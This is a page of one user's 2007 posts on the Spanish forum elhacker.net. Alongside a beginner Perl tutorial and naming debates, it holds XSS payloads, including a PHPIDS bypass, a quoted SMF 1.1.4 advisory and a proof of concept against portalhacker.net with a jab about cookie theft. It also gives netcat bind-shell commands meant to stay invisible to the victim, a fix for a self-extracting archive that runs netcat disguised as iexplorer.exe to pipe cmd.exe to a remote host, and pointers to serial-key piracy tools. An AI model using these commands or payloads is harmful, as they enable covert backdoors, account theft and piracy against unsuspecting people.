elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 ... 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 [434] 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 ... 456
4331  Foros Generales / Sugerencias y dudas sobre el Foro / "Hacking Linux/Unix" y GNU que? en: 8 Noviembre 2007, 21:03 pm
Que yo sepa Linux y Unix no es GNU y lo que la mayoría usamos es GNU/Linux asi que pienso que al llamarse esa sección "Hacking Linux/Unix" significa que no hay hacking en GNU el cual usamos nosotros. UNIX no es un SistemaOperativo libre, no así GNU que utiliza el kernel de Linux sobre el cual existen sus distritos que todos conocen... ubuntu, ututo, red hat, bsd, etc etc.

Yo opino que esa sección devería llamarse "Hacking GNU-Unix/Linux" o "Hacking Linux/GNU/Unix"de esta forma también abarcamos los kernels que no son linux... es mas... ni si quiera devería llamarse Linux ya que con nombrar ambos Sistemas Operativos ya lo abarcamos. ¿Que tal "Hacking GNU -Unix" ??

Bién decía Richard Stallman "GNU (GNU No es Unix)"
4332  Programación / PHP / PHPIDS no me filtra una petición en: 8 Noviembre 2007, 02:53 am
Estaba instalando phpids en una prueba en mi localhost para implementarlo en joomla y va todo bién exepto por este script que no me lo filtra:

http://127.0.0.1/joomla/phpids/docs/examples/example.php?test='" onload();
Citar

Si pongo una comilla simple o doble si me lo filtra pero al poner eso completo no.
De todas formas un ataque de tipo <input type="text" name="mail" value="" > donde en una petición GET se rellene ese input puede provocar un XSS.

Todo está configurado por defecto. Hice algo mal? o hay que avisar?
4333  Programación / Scripting / Tutorial Perl desde cero en: 7 Noviembre 2007, 04:15 am
Como veo que no hay mucho material de Perl acá y si varios interesados... les dejo un tutorial que acabo de hacer... otro dia termino la segunda parte.

Programación en Perl I

Al igual que ustedes yo también aprendo por lo cual quiero compartir lo que yo se con ustedes para que todos juntos podamos aprender cada ves mas.

Perl es un lenguaje scripting interpretado, eso significa que necesitamos un software que leerá nuestros scripts y los ejecutará.
Les demostraré que tan facil puede ser aprender este lenguaje tan flexible, útil y facil de aprender.
Este tutorial va dedicado a usuarios de Linux en todas sus distribuciones ya que por defecto viene el software que ejecutará nuestros scripts llamado “Perl”, en el caso de Windows tendrás que instalar “Active Perl” y “Cygwin” para acomodar cada función de linux y hacer mas poderosos nuestros scripts.

Mi primer script
Abrimos nuestro editor de texto (en Linux podemos usar gedit, kwrite o lo que sea... en Windows usaremos el block de notas) y comenzaremos a crear nuestro primer script:

Código
  1. #!/usr/bin/perl -w
  2. #test.pl
  3.  
  4. print "hola\n";
  5. exit(0);

¿Que significa cada linea, como lo ejecutamos y que hace?
Cada linea que comienza con el carácter "#" será omitido al momento de ejecutarse el script, esto significa que son comentarios o cualquier cosa que quieras escribirle, esto no se ejecutará ni será tomado en cuenta.
En el caso de linux esto significa que es un código en perl e indica la dirección de perl, esto siempre Debes ponerlo al rpincipio, si no lo pones no pasa nada pero si se hace por costumbre para identificar que es un script en perl. Al pasar el mouse sobre el archivo este tomará el ícono de ejecutable devido a esa primera linea y será cosiderado un "script en Perl".
Código
  1. #!/usr/bin/perl -w

Ahora pongo un comentario para indicar el nombre del archivo (esto no es obligación pero yo lo puse para mayor orden).
Código
  1. #test1.pl

Ahora ejecutamos un print para escribir en pantalla la palabra hola. Esto puede crearse de muchas maneras según lo necesites, también esribimos “\n” el cual significa que al final de la palabra hola se escribirá el carácter “return” para seguir en la linea de abajo.
Código
  1. print "hola\n";

Esto también podemos ejecutarlo de las siguientes maneras:
Código
  1. print "hola";
  2. print("hola");
  3. print 'hola';
  4. print('hola');

Al igual que en el lenguaje C++ puedes utilizar "printf" de la misma manera pero no "echo".

Acá le decimos que es el término del script, puedes no ponerlo pero se hace por costumbre en un buén script. Cuando digo exit(0) significa que no hubo errores, si escribo exit(1) le estoy diciendo al sistema que se produjo un error o los resultados no fueron lo esperado, esto lo puedes utilizar en complementos que veremos en otra oportunidad.
exit(0);

¿Como lo ejecutamos?
Guardaremos nuestro texto en el escritorio como test1.pl y desde la consola de comandos ejecutaremos lo siguiente:
En Linux:  perl ./test.pl
En Windows: c:\perl\perl.exe "%homepath%\escritorio\test.pl"


Nos aparecerá la palabra hola :D
Citar
yan@Lola:~/Desktop$ perl ./test.pl
hola
yan@Lola:~/Desktop$

Ahora para practicar escribiremos algunos textos en pantalla:
Código
  1. #!/usr/bin/perl -w
  2. #test2.pl
  3.  
  4. print "hola,\n";
  5. print "Como puedes ver acá escribio que sea sin problemas y con el carácter '\\n' hago return.\n";
  6. printf "También puedo utilizar printf de la misma manera. Ahora vamos a salir del programa:\n";
  7. exit(0);
  8. print("Como ves esto no se ejecuta porque ya salí :p");


While y for
Estas dos funciones son muy útiles para automatizar todo un proceso:
Código
  1. #!/usr/bin/perl -w
  2. #test3.pl
  3.  
  4. my $cuenta = 1;
  5.  
  6. #-------------------------------------------------------------------------------------------------
  7. print "Escribiremos desde 000 hasta 100\n";
  8. for $i ( "000" .. "100" ) {
  9. print "$i\n";
  10. }
  11. #-------------------------------------------------------------------------------------------------
  12. print "Escribiremos 100 más, pero con while:\n";
  13. while ( $cuenta <= 100 ) {
  14. print "$cuenta\n";
  15. $cuenta++;
  16. }
  17. #-------------------------------------------------------------------------------------------------
  18. print "Fijate que si no le pongo comillas no tomará los ceros al comienzo:\n";
  19. for $i ( 000 .. 100 ) {
  20. print "$i\n";
  21. }
  22. #-------------------------------------------------------------------------------------------------
  23. exit(0);

¿Que tal si me escribes en pantalla 100 veces la frase "no molestaré mas a mis compañeros" ? a Vart de los Simpsons de seguro le gustaría jajaja:
Código
  1. #!/usr/bin/perl -w
  2. #test4.pl
  3.  
  4. for $i ( "000" .. "100" ) {
  5. print "No molestaré mas a mis compañeros.\n";
  6. }
  7. exit(0);

Si te fijas utilizé tres formas diferentes de hacer lo mismo, además con el carácter "#" puse unas lineas para separar cada código y así se vea mas ordenado.

Ustedes dirán... ¿Para que sirve "my $cuenta = 1;"? :

Declaraciones
Código
  1. #!/usr/bin/perl -w
  2. #test5.pl
  3.  
  4. my $saludo = "Hola";
  5. my $nombre = "WHK";
  6.  
  7. print "$saludo $nombre , como estas?";
  8. exit(0);

Esto nos escribirá lo siguiente:
Citar
yan@Lola:~/Desktop$ perl ./test5.pl
Hola WHK , como estas?
yan@Lola:~/Desktop$

También podemos crear una declaración de diferentes formas:
Código
  1. #!/usr/bin/perl -w
  2. #test6.pl
  3.  
  4. my ($saludo, $nombre);
  5. $saludo = "Hola";
  6. $nombre = "WHK";
  7.  
  8. print "$saludo $nombre , como estas?\n";
  9. exit(0);

Variables
Código
  1. #!/usr/bin/perl -w
  2. #test7.pl
  3.  
  4. my ($saludo, $nombre);
  5. unless (@ARGV == 1) { die "uso: $0 Nombre\n" } ($nombre) = @ARGV;
  6. $saludo = "Hola";
  7.  
  8. print "$saludo $nombre , como estas?\n";
  9. exit(0);
  10.  
¿Que significa esto?
No se asusten :p es facil, es mas... puedes copiar el código y usar siempre el mismo, solo cambias ciertas cosas que te diré ahora,

Cuando ejecutas tu script te dirá lo siguiente:
Citar
yan@Lola:~/Desktop$ perl ./test7.pl
uso: ./test.pl Nombre
yan@Lola:~/Desktop$ perl ./test7.pl WHK
Hola WHK , como estas?
yan@Lola:~/Desktop$


Si te fijas la primera ves que lo ejecuté me decía como utilizarlo... que primero debería ejecutar el script mas un espacio y el nombre, al ejecutarlo nuevamente le di mi nombre y me lo escribió...
Citar
yan@Lola:~/Desktop$ perl ./test7.pl Octalh
Hola Octalh , como estas?
yan@Lola:~/Desktop$

Ahora implementemos variables con declaraciones for o while :D, no se asusten con tanta palabrería porque no es  tan dificil cuando escribes por ti mismo el código:
Código
  1. #!/usr/bin/perl -w
  2. #test8.pl
  3.  
  4. my ($cuenta);
  5. unless (@ARGV == 1) { die "uso: $0 Cuenta\n" } ($cuenta) = @ARGV;
  6.  
  7. for $i ( 1 .. $cuenta ) {
  8. print "Escribiendo $i...\n";
  9. }
  10.  
  11. exit(0);

Esto me dará lo siguiente:
Citar
yan@Lola:~/Desktop$ perl ./test8.pl 10
Escribiendo 1...
Escribiendo 2...
Escribiendo 3...
Escribiendo 4...
Escribiendo 5...
Escribiendo 6...
Escribiendo 7...
Escribiendo 8...
Escribiendo 9...
Escribiendo 10...
yan@Lola:~/Desktop$

Si quieres agregar mas de una variable tendrás que modificar su código:
Código
  1. #!/usr/bin/perl -w
  2. #test9.pl
  3.  
  4. my ($cuenta, $palabra);
  5. unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV;
  6.  
  7. for $i ( 1 .. $cuenta ) {
  8. print "$palabra $i...\n";
  9. }
  10.  
  11. exit(0);

Esto quiere decir:
Código
  1. unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV;
Si las variables no son 2 entonces que no ejecute nada y que diga su utilización y si hay dos variables entonces la primera será $palabra y la segunda será $cuenta. Puedes modificar ese orden a tu gusto o agregarles las variables que tu quieras. $0 significa el nombre del mismo archivo que estás ejecutando.

If y Else
Ahora les voy a mostrar algo muy útil:
Código
  1. #!/usr/bin/perl -w
  2. #test10.pl
  3.  
  4. my ($cuenta, $palabra);
  5. unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV;
  6.  
  7. if ($cuenta == 0) {
  8.     $cuenta = 10;
  9. }
  10.  
  11. else {
  12.     for $i ( 1 .. $cuenta ) {
  13.     print "$palabra $i...\n";
  14.     }
  15. }
  16.  
  17. exit(0);

Esto significa que cuando ejecutes el script primeramente verificará la variable:
Código
  1. unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV;

Luego verificará que si la variable $cuenta es igual a cero entonces le asignará el número 10
Código
  1. if ($cuenta == 0) {
  2.     $cuenta = 10;
  3. }

Si no es igual a cero entonces escribirá en pantalla lo pedido:
Código
  1. else {
  2.     for $i ( 1 .. $cuenta ) {
  3.     print "$palabra $i...\n";
  4.     }
  5. }

Y como siempre al final termina todo:
Código
  1. exit(0);

Ahora utilizaremos if para saber si existen archivos o no:
Código
  1. #!/usr/bin/perl -w
  2. #test11.pl
  3.  
  4. if (-e "test2.pl") {
  5. print "Si existe\n";
  6. } else {
  7. print "No existe\n";
  8. }
  9.  
  10. exit(0);

Lo mismo pero con variables:
Código
  1. #!/usr/bin/perl -w
  2. #test12.pl
  3.  
  4. my ($archivo);
  5. unless (@ARGV == 1) { die "uso: $0 [archivo]\n" } ($archivo) = @ARGV;
  6.  
  7. if (-e $archivo) {
  8. print "$archivo si existe\n";
  9. } else {
  10. print "$archivo no existe\n";
  11. }
  12.  
  13. exit(0);

Ahora que ya sabes un poco mas sobre scripts en Perl deverás practicar creando tus propios códigos cada ves más complejos o hasta donde esté tu conocimiento e imaginación.

En el próximo número publicaré un script que estoy creando, como averigüé sobre cada función y muchas otras cosas más como el uso de sockets y uso de comandos system();.

Saludos y hasta la próxima. Att. WHK.
Puedes bajar el documento en formato odt en tar.gz desde acá
4334  Programación / Scripting / Re: [BATCH] Ocultar lo que hace una orden en: 3 Noviembre 2007, 19:44 pm
Código:
@MOVE %1 C:\PAPERERA > nul && echo archivo  %1 eliminado.
Los batch son scripts por lo cual va en el subforo de scripting
4335  Seguridad Informática / Nivel Web / Re: XSS en PortalHacker.net en: 2 Noviembre 2007, 01:10 am
Citar
Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!

No hay aún pero no te preocupes ya que no son remotos a menos que se incluya un CSRF aunque dudo mucho que SMF sea vulnerable a eso.

Supongo que te refieres a este:
Citar
  _____________________________________________________________________
_______
 |                                                                            |
 | __________.__                 __   __________               __             |
 | \______   \  | _____    ____ |  | _\______   \ ____   _____/  |_  ______   |
 |  |    |  _/  | \__  \ _/ ___\|  |/ /|       _//  _ \ /  _ \   __\/  ___/   |
 |  |    |   \  |__/ __ \\  \___|    < |    |   (  <_> |  <_> )  |  \___ \    |
 |  |______  /____(____  /\___  >__|_ \|____|_  /\____/ \____/|__| /____  >   |
 |         \/          \/     \/     \/       \/                        \/    |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |    http://www.blackroots.it                  staff[at]blackroots[
dot]it      |
 |                                                                            |
 |    Autore : The-Dark_Man && Bled                                           |
 |____________________________________________________________________________|
 
 ##############################################################################
 #                                                                            #
 #                               XSS smf 1.1.4                                #
 #                                                                            #
 ##############################################################################
 
Found Xss in the administration...
 
1----------------------
Go to http://link/[path]/index.php?action=news
Modify the news and insert
<script>alert('Xss')</script>
Save the news! no an alert will be generated in every page!
 
2---------------------
Go to http://link/[path]/index.php?action=manageboards
Create a new forum with Title:
<script>alert('Xss')</script>
result? XSS  ;)
 
3---------------------
Go here http://link/[path]/index.php?action=membergroups;
Modify or create a new gruop and name it:
<script>alert('Xss')</script>
;)

----------------------
The-Dark_Man && Bled of blackroots.it
4336  Seguridad Informática / Nivel Web / Re: XSS en PortalHacker.net en: 2 Noviembre 2007, 01:05 am
NO..... ese buscador no es propio del foro, el XSS de SMF es otro mas :P al final tienen como 4 XSS incluyendo web y foro pero la diferencia es que los que tu dices son solo locales y tendrías que tener derechos sobre el foro para crear los XSS, este que yo digo cualquiera puede crearlo.
4337  Seguridad Informática / Nivel Web / XSS en PortalHacker.net en: 2 Noviembre 2007, 00:54 am
Hace tiempo encontré algunos XSS en elhacker.com y .org pero aún no los reparan a pesar del tiempo que llevan y de que fueron publicados y avisados. Ahora portalhacker.net también tiene un XSS localizado en el buscador de la pagina principal.

PoC:
Código
  1. <form name="buscarform" action="http://www.portalhacker.net/buscar.php" method="post">
  2. <input name="buscar" type="hidden" value="ok">
  3. <input name="query" type="text" size=12 value="Pon tu XSS acá">
  4. <input type="submit" value="Enviar"></form>
Donde puse "Pon tu XSS acá" prueba con enviar la siguiente petición post: "<script>alert(/xss/);</script>"

Después se quejan del porqué les roban las cookies.
4338  Programación / Scripting / Re: Batch + NetCat (ayuda) en: 31 Octubre 2007, 19:10 pm
Citar
nc.exe -vv -l -p 6000
No te va a resultar ya que primeramente la persona no deberia ver nada asi que Debes quitarle el -vv además Debes agregarle -d (die console) ya que si cierra la ventana entonces se desconectará... también Debes especificar que utilizará la consola de comandos a ejecutar si es eso lo que quieres.

Windows:
nc.exe -d -e cmd.exe -L -p 6000

Linux:
nc -l -d -p 6000 -e /bin/sh
sudo nc -l -d -p 6000 -e /bin/sh
4339  Seguridad Informática / Hacking / Re: Necesitas una contraseña? en: 31 Octubre 2007, 14:14 pm
Citar
oiie solo qeria saber si tu sabes donde puedo conseguir el numero de activacion para el programa virtuallab v5.5.15.505 para windows

Si necesitas un serial no te rompas loa cabeza buscando en páginas que ni sabes que te están dando, buscate el Serialz2000 y te bajas cada actualización. Una ves abierto le das el nombre del programa y te da su correspondiente serial. Tiene una base de datos interna impresionante.

Código:
http://www.serialz.to/

También puedes buscar Craagle o el Serials Downloader, etc etc.
4340  Seguridad Informática / Hacking / Re: Jugando con netcat en: 31 Octubre 2007, 14:07 pm
Código:
C:\Documents and Settings\Administrador>echo %homedrive%%homepath%
C:\Documents and Settings\Administrador

Código:
C:\Documents and Settings\Administrador>echo %homedrive%%windir%
C:C:\WINDOWS

Reemplaza %homedrive%%windir% por %windir%

Código:
Ejecutar tras la extraccion
"%homedrive%%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25

Reemplazalo por:
Código:
Ejecutar tras la extraccion
"%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25
Páginas: 1 ... 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 [434] 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines